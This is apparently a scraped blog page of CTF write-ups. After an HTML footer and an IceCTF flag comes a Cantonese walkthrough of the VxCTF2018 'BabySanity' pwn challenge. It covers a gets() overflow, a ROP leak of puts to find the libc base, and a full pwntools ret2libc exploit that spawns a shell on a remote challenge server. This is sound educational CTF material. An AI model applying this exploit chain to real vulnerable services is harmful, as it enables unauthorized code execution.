Made with <a class="brown-text text-lighten-3" href="http://materializecss.com">Materialize</a>
</div>
</div>
</footer>

<div id="comment-modal" class="modal">
<nav class="cyan">
<div class="nav-wrapper">
<div class="left col s12 m5 l5">
<ul>
<li><a class="modal-action modal-close"><i class="material-icons">keyboard_backspace</i></a>
</li>

<li><a href="#!">Comment</a>
</li>
</ul>
</div>
<div class="col s12 m7 l7 hide-on-med-and-down">
<ul class="right">

<li><a class="modal-action modal-close comment-send"><i class=" material-icons">send</i></a>
</li>
</ul>
</div>

</div>
</nav>
<div class="modal-content">
<form id="comment-form" action="/comment" method="post">
<div class="input-field">
<textarea id="comment" class="materialize-textarea" length="500"></textarea>
<label for="comment">Comment</label>
</div>
<input type="hidden" name="postId" id="postId" value="2">
</form>
</div>
</div>
</div>



<!--Import jQuery before materialize.js-->
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
<script type="text/javascript" src="/static/js/materialize.min.js"></script>
<script type="text/javascript" src="/static/js/init.js"></script>
<script type="text/javascript" src="/static/js/main.js"></script>
</body>
</html>

Flag

1
IceCTF{who_trusts_these_cookies_anyway?}

VxCTF2018-BabySanity

Question

Binary

sanity
libc-2.23.so

Solution

一見到有個.so 比賽果陣都放棄左了 , 呢題係完左之後2日先做番出黎

首先啦 , 基本動作 checksec先

1
2
3
4
5
Arch:    amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

之後扔入IDA睇下個Main先

1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [sp+10h] [bp-70h]@1

puts("Sanity Check should be easy");
fflush(_bss_start);
gets(&v4);
return 0;
}

Leak Function Address

首先試下點樣可以 trigger main行多次先

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

p = process('sanity')
e = ELF('./sanity')

payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(0x401000) #just for fill rdi
payload += p64(e.symbols['main'])
"""
Output:
Sanity Check should be easy
Sanity Check should be easy
"""

可以見到已經行左2次 , 咁如果我地將0x401000轉做一個function既地址會點?
最終係可以構做到變成puts(gotAddress)
例如想leak libc既main 可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

p = process('sanity')
e = ELF('./sanity')

gadget = 0x4006a3 #pop rdi;ret;

payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['__libc_start_main'])
payload += p64(e.plt['puts']) #puts(__libc_start_main_got)
payload += p64(e.symbols['main'])
"""
Output:
有堆亂碼 , 應該係address既hex string黎
Sanity Check should be easy
"""

咁我地試下leak puts既address啦 , 搵offset都方便d

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *

p = process('sanity')
e = ELF('./sanity')

gadget = 0x4006a3 #pop rdi;ret;
libc_puts_off = libc.symbols['puts']

payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts']) #puts(puts_addr_got)
payload += p64(e.symbols['main'])

p.recvuntil("easy\n")
p.sendline(payload)

leaked = p.recvuntil("\n")
print leaked.encode('hex')
"""
Output:
90afab45ad7f0a
Sanity Check should be easy
"""

咁個puts address應該係7fad45abaf90 , 但係多左個0a又調轉左喎 , 咁format下佢 , 同埋計番個libc_base先

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

p = process('sanity')
e = ELF('./sanity')

gadget = 0x4006a3 #pop rdi;ret;
libc_puts_off = libc.symbols['puts']

payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts']) #puts(puts_addr_got)
payload += p64(e.symbols['main'])

p.recvuntil("easy\n")
p.sendline(payload)

leaked = p.recvuntil("\n")
leaked = u64(leaked[:-1].ljust(8,'\x00'))

libc_base = leaked - libc_puts_off
info("Libc base:" + hex(libc_base))
"""
Output:
[*] Libc base: 0x7f28573b5900
"""

咁之後就可以慢慢拎番 binsh 既offset 同埋system既offset , 加番libc base , 再做ROP

1
2
libc_system_off = libc_base + libc.symbols['system']
libc_binsh_offset = libc_base + next(libc.search('/bin/sh'))

ROP

  1. Buffer overflow

    1
    2
    3
    pattern create 200 input
    r < input
    pattern search
  2. 搵ROPgadget (pop rdi; ret;)

    1
    ROPgadget --binary sanity --only 'pop|ret'
  3. 砌積木

    1
    buffer + gadget + binsh_addr + system_addr

Full exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *

#p = process("./sanity")
p = remote("35.185.151.73",8044)

libc = ELF("./libc-2.23.so")
e = ELF('./sanity')

libc_system_off = libc.symbols['system']
libc_puts_off = libc.symbols['puts']
libc_binsh_offset = next(libc.search('/bin/sh'))
gadget = 0x4006a3

info("libc system offset: " + hex(libc_system_off))
info("libc /bin/sh offset: " + hex(libc_binsh_offset))
info("libc puts offset: " + hex(libc_puts_off))

payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.symbols['main'])

p.recvuntil("Sanity Check should be easy\n")
p.sendline(payload)

leaked = p.recvuntil("\n")
leaked = u64(leaked[:-1].ljust(8,'\x00'))
libc_base_addr = leaked - libc_puts_off

info("leaked puts: " + hex(leaked))
info("libc base: " + hex(libc_base_addr))

p.recvuntil("\n")
payload = "a"*(0x70+8)
payload += p64(gadget)
payload += p64(libc_base_addr + libc_binsh_offset)
payload += p64(libc_base_addr + libc_system_off)

p.sendline(payload)
p.interactive()